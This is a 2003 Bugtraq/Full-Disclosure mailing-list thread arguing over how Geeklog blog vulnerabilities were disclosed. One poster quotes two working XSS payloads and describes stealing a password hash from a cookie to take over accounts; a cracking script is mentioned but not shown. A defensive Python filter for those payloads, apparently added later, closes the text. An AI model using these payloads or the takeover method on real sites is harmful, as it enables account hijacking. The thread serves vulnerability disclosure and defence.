[32023] in bugtraq


Re: [Full-Disclosure] Re: I have fixes for the Geeklog

daemon@ATHENA.MIT.EDU (Chris.Kulish@us.ing.com)
Wed Oct 8 14:38:56 2003

To: jkuperus@planet.nl
Cc: full-disclosure@lists.netsys.com, bugtraq@securityfocus.com,
        dirk@haun-online.de
Message-ID: <OFFD30122A.789CCA02-ON86256DB9.005B86BA-86256DB9.005D909F@equitable-of-iowa.com>
From: Chris.Kulish@us.ing.com
Date: Wed, 8 Oct 2003 11:53:57 -0500
MIME-Version: 1.0
Content-Type: multipart/mixed;
 boundary="0__=09BBE72ADFC8002A8f9e8a93df938690918c09BBE72ADFC8002A"
Content-Disposition: inline



Let me start off by saying that I am NOT a geeklog developer.  I would also
like to mention, like any project, a lot of this code was inherited by the
developers and they have been working hard to squash security bugs when
notified properly.  Give the developers a chance to keep their users
secure.

Comments in line:

-----
Chris Kulish
Systems Engineer
ING Advisors Network
chris.kulish@us.ing.com
Ph. 515.698.7583
Fx. 515.698.3583

"There's more to living than only surviving"
"Maybe I'm not there, but I'm still trying"
-- The  Offspring
-----


                                                                                                                                 
jelmer <jkuperus@planet.nl>
10/07/2003 07:23 PM

To:       "Dirk Haun" <dirk@haun-online.de>, full-disclosure@lists.netsys.com, bugtraq@securityfocus.com
cc:       (bcc: Chris Kulish/BDN/ING-FSI-NA)
Subject:  Re: [Full-Disclosure] Re: I have fixes for the Geeklog vulnerabilities




Dirk,

Ok let me get this straight, basically what you're saying is,
He's correct on one point, the xss issue, and the others might possibly
affect mysql 4.1" (it does)
and then you go about and tell him how he wasted everybody's time.
So if it affects only 1% of your userbase it's not an issue and you
shouldn't
be reporting it?
even on mysql 3 it's probably possible to construct some url that will suck up
a lot of resources

on your site you claim Three members of the Geeklog development team have
now been trying to reproduce
these issues and failed, wouldn't your time have been better spent *fixing*
these issues,
it's hardly rocket science. Why wait until someone comes up with a clever
way to exploit it. It's obviously
a risk, why wait until it becomes a threat

---
First, if you can't reproduce a problem, how can you expect to fix it?  It's
not rocket science, you are correct.  Even so, why not approach it
properly?
---

IMHO you've got the wrong attitude. Anyway I am not done yet.
I don't normally "do" sql injection but being annoyed with your response as
I was I took a quick
look at this geeklog, and I was stunned at how insecure it was

---
I've been annoyed at the disclosure as well.  People need to contact the
developers *FIRST*, before running at the mouth, for a number of reasons.
To confirm the installation environment of the alleged security breach. To
let the authors attempt to reproduce it accordingly.  To not compromise the
userbase that can't do anything about it until the programmers are done.
Shall I go on?  Yes, geeklog has security issues, name one piece of
software that doesn't.
---

- It by default stores the password hash in a cookie, you can't turn that
off
- you don't have to enter your old password in order to change it

this means that any xss issue in this site will lead to compromises of
accounts, you can steal the
hash and userID, place it in your cookie, log in and voila. if you do this
you have to be *EXTREMELY*
wary of xss issues, well you're not, you can find these all over the place

---
And 90% of geeklog sites are non-ssl, so what's your point?  The username
and password pairs are already transmitted in cleartext.  Remember what
geeklog is geared towards, blogging.  This isn't a HIPAA qualified
application, nor was it meant to be.
---

all the classics just work like

<img src="javascript:alert()">

<b style="background-image: url(javascript:alert(document))">test</b>

in the forum, I won't even bother listing all the issues

parameters passed in urls that get inserted into queries get sanitized
hardly anywhere,
I attached a python script that should crack any user's account who ever
posted to the forums in under half an hour,
just get the hash, stuff it and the accompanying user id in a cookie, get to
the site and change the password.
The exploit is rather messy and I haven't tested it too thoroughly but it
should work (i think :) )  note this is a separate issue from the ones
reported by Lorenzo. but again these issues are all over the place

---
And did you contact the developers about this before emailing the security
lists?  Let's *ALL* be responsible about disclosure.  It's not just the
developers that have to be responsible about security
---

--jelmer




----- Original Message -----
From: "Dirk Haun" <dirk@haun-online.de>
To: <full-disclosure@lists.netsys.com>
Sent: Sunday, October 05, 2003 11:03 PM
Subject: [Full-Disclosure] Re: I have fixes for the Geeklog vulnerabilities


> Lorenzo Hernandez Garcia-Hierro wrote:
>
> >Due to the completely incorrect treatment and work of the Geeklog
> >development team , that they don't developed fixes for THEIR product
>
> As a member of the Geeklog Development Team, I'd like to point out that
> the poster of the above lines did not bother to contact us, both with his
> original findings, nor with these patches. Talk about incorrect
> treatment.
>
> Furthermore, of the original findings (posted here and on BugTraq a week
> ago), only the Shoutbox issue has been confirmed (and a patch is
> available on the Geeklog website).
>
> None of the supposed SQL injection issues that Lorenzo Hernandez Garcia-
> Hierro claims to have found could be confirmed by us or members of the
> Geeklog community. We can only assume that he only noticed that when
> attempting to inject SQL into URLs, Geeklog would produce SQL errors and
> from that he seems to have deduced that Geeklog was vulnerable for SQL
> injections. When asked to explain his findings, he couldn't (or wouldn't)
> come up with a working example either.
>
> Now, there's no doubt that Geeklog could do a better job in filtering
> these attempts. Work on that is currently under way - which we would have
> told Lorenzo Hernandez Garcia-Hierro if he had bothered to contact us.
>
> Potential problems that we have found so far:
>
> - the SQL error message displayed by Geeklog could, in theory, leak
> sensitive information
> - sites where the PHP magic_quotes setting is OFF are slightly more prone
> to the (alleged) injections than when it's ON
> - sites running on MySQL 4.1 (which is currently in alpha state and not
> ready for production use) are at a higher risk since MySQL 4.1 allows
> concatenation of SQL requests (which previous versions didn't)
>
> We have informed our users about these issues on the Geeklog homepage and
> will continue to do so. We value security very highly, but we prefer to
> handle it in a non-sensationalist way. We would have preferred to come up
> with a solution to the problems and then post a detailed analysis of the
> problems here (and on BugTraq). With his failure to contact the
> developers, Lorenzo Hernandez Garcia-Hierro has yet again caused more
> confusion than actually helping the situation.
>
> Overall, this is a textbook example of how NOT to handle security issues.
> By not contacting the developers, posting a report full of inaccuracies,
> and, in the end, mostly non-working examples, Lorenzo Hernandez Garcia-
> Hierro has caused uncertainty and confusion amongst the Geeklog users and
> basically wasted everyone's time, including that of the developers.
>
> Dirk Haun,
> Maintainer of the Geeklog 1.3.x branch,
> Geeklog Development Team
>
>
> --
> http://www.geeklog.net/
> http://geeklog.info/
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
(See attached file: geeklog.py)
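The two forum payloads jelmer quotes (a javascript: URL in an <img src> and one inside a CSS url() in a style attribute) are exactly what a forum post filter has to catch before the markup is stored. The checker below is an added example, not code from this thread, from the attached geeklog.py or from Geeklog itself; the sample fragments are constructed, and it is an attribute-level check rather than a full HTML parser.

```python
import html
import re

# Added example, not from the thread or from Geeklog. Flags javascript:/vbscript:
# URLs in URL-bearing attributes and inside CSS url() in style attributes.
# Values are entity-decoded and stripped of control/whitespace characters first,
# so "java&#115;cript:" or "java\tscript:" are not missed.

TAG_RE = re.compile(r'<\s*([a-zA-Z][\w-]*)([^>]*)>')
ATTR_RE = re.compile(r'(\w+)\s*=\s*(?:"([^"]*)"|\'([^\']*)\'|([^\s>]+))')
CSS_URL_RE = re.compile(r'url\s*\(\s*["\']?([^"\')]*)', re.I)
URL_ATTRS = {'src', 'href', 'background', 'lowsrc', 'dynsrc', 'action'}

def _is_script_url(value):
    """True if the decoded, whitespace-stripped value starts with a script scheme."""
    decoded = re.sub(r'[\x00-\x20]', '', html.unescape(value)).lower()
    return decoded.startswith(('javascript:', 'vbscript:'))

def _script_url_in_attr(name, value):
    """Return the offending URL carried by this attribute, or None."""
    if name in URL_ATTRS and _is_script_url(value):
        return value
    if name == 'style':
        for css in CSS_URL_RE.findall(html.unescape(value)):
            if _is_script_url(css):
                return css
    return None

def _attr_parts(m):
    return m.group(1).lower(), (m.group(2) or m.group(3) or m.group(4) or '')

def find_script_urls(fragment):
    """Return (tag, attribute, url) for every script URL found in the fragment."""
    hits = []
    for tag_match in TAG_RE.finditer(fragment):
        tag, attrs = tag_match.group(1).lower(), tag_match.group(2)
        for m in ATTR_RE.finditer(attrs):
            name, value = _attr_parts(m)
            if (bad := _script_url_in_attr(name, value)) is not None:
                hits.append((tag, name, bad))
    return hits

def neutralise(fragment):
    """Drop every attribute that carries a script URL; leave all other markup alone."""
    def fix_tag(tag_match):
        def fix_attr(m):
            return '' if _script_url_in_attr(*_attr_parts(m)) else m.group(0)
        rest = ATTR_RE.sub(fix_attr, tag_match.group(2)).strip()
        return '<%s%s>' % (tag_match.group(1), ' ' + rest if rest else '')
    return TAG_RE.sub(fix_tag, fragment)
```

Run find_script_urls over a post before saving it to log the attempt, and store neutralise(post) instead of the raw markup; both are best used in addition to, not instead of, escaping untrusted HTML on output.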




